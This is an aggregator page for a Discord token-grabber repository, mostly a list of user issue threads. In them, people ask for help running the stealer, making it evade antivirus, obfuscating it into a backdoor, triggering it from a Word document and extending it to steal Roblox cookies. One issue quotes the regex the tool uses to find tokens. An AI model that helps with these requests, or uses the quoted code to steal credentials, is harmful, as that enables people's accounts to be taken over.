Git Product home page Git Product logo

discord-token-grabber's People

Contributors

wodxgod avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

discord-token-grabber's Issues

No webhooks found

How come I keep on getting No tokens found. i've created the web hook and made a tested it on my other discord account. It's going throught but I keep on getting No webhook found. Why is this?

not work

when me run is error are you a live?

Chat ID?

Can you add a way to see the user's discord username and tag I have no idea whos token is whos.

AV bypass ?

is there any way to make this, undetected by AV programs ? And if it is possible, how ?

It doesn't work!

I set my webhook, copypaste my token, try to open it and it immediatly closes without any errore, the webhook doesn't send anything.!

Roblox .ROBOSECURITY token stealer?

Basically the same as a discord token stealer, but instead of discord letting one access a Roblox account.
Would that be possible for you to release?

What does line 22-25 do?

So i was trying to understand the working of the program but I don't get what is happening in the lines 22-25, ie:

        for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
            for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                for token in re.findall(regex, line):
                    tokens.append(token)

What do these lines mean?

Can someone please help me?

I have created a webhook in discord and i put the webhook url in the tooken grabber and opened it in python but nothing is showing up in my server.. i could really use some help from a kind spirit

request

can you please make it possible where you open a word document and it grabs the victims discord token?

Yo you alive dude?

Trying to contact you regarding continuation of a past project. Keep seeing your accounts getting suspended on twitter and shit, try using matrix. Its like discord but you cant get your account banned. hmu at @GalacticB69:matrix.org. I recommend the element client but you can use it in your browser.

/

Hi, is in this file a Virus? Or is this a mistake?
image

how i can run this

how i can run this script and where the tokens will be displayed

how a person run this token grabbler

How

How can i download it ?

Question

I dont understand the 2nd and 3rd steps. Can someone help me explain?

help

created a webhook but like what i have to do where i put this code?

o

K

exe not working but py is

the py works fine, but if you want to turn it into an exe, (lets say with auto-py-to-exe), it doesnt work anymore. Any fix?

Doesn't work for me

So, I think, I did everything ok, compiled it and etc (even version modifyed by Jansy-cc), but it just opens python window, closes it, and that's all; no messages was sent by webhook

Worked, and then stopped.

I've used it around 20 times normally, I stopped for a bit to go do other things, and suddenly it doesn't work anymore. None of the webhooks I tried, on different accounts, etc., didn't work. No errors either.

Keeps generating same tokens

Hi so whenever I run this program it keeps generating the same tokens over and over again? Is there any fix for this? I have added multiple different people into my server and it keeps generating the same two tokens.

help

is it working right now?

Script Fails to Run

Hello

I copied the contents of the file and changed the WEBHOOK_URL variable into the webhook that I made. I also changed the PING_ME variable to True.

When I run the script, it gives me a FileNotFound error, so I tried to fix it by adding or FileNotFoundError in Line 45 so it looks like this:

    for platform, path in paths.items():
        if not os.path.exists(path) or FileNotFoundError:
            continue

All it did was ping me. It did not give me the error.

Error Message (full):

Traceback (most recent call last):
  File "c:\Users\Kiwifruit\Documents\Scripts\Python\Console-Based\TokenGrabber\main.py", line 74, in <module>
    main()
  File "c:\Users\Kiwifruit\Documents\Scripts\Python\Console-Based\TokenGrabber\main.py", line 50, in main
    tokens = find_tokens(path)
  File "c:\Users\Kiwifruit\Documents\Scripts\Python\Console-Based\TokenGrabber\main.py", line 18, in find_tokens
    for file_name in os.listdir(path):
FileNotFoundError: [WinError 3] The system cannot find the path specified: 'C:\\Users\\Kiwifruit\\AppData\\Roaming\\Opera Software\\Opera Stable\\Local Storage\\leveldb'

Any way to fix this?

ok,

so i add the webhook where its supposed to be i lauched it myself and somehow my token doesnt show up

i need hep

so when i run the .exe it says this app cant run on your pc to find a version for your pc check with the software publisher

Step 3

How do I obfuscate the code or send it as a backdoor?

discord or google chrome

I know it may seem stupid, but is there a difference between them . And is there a way to use the discord part as the token
Screenshot 2021-12-04 214711

Doesn't work

I tried doing this and it doesn't work.I did replace the webhook but it doesn't do anything.I tried downloading it myself and it doesn't work....

Discord link is expired.

This Discord link along with like ever other one that you have on all of your social medias is expired.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.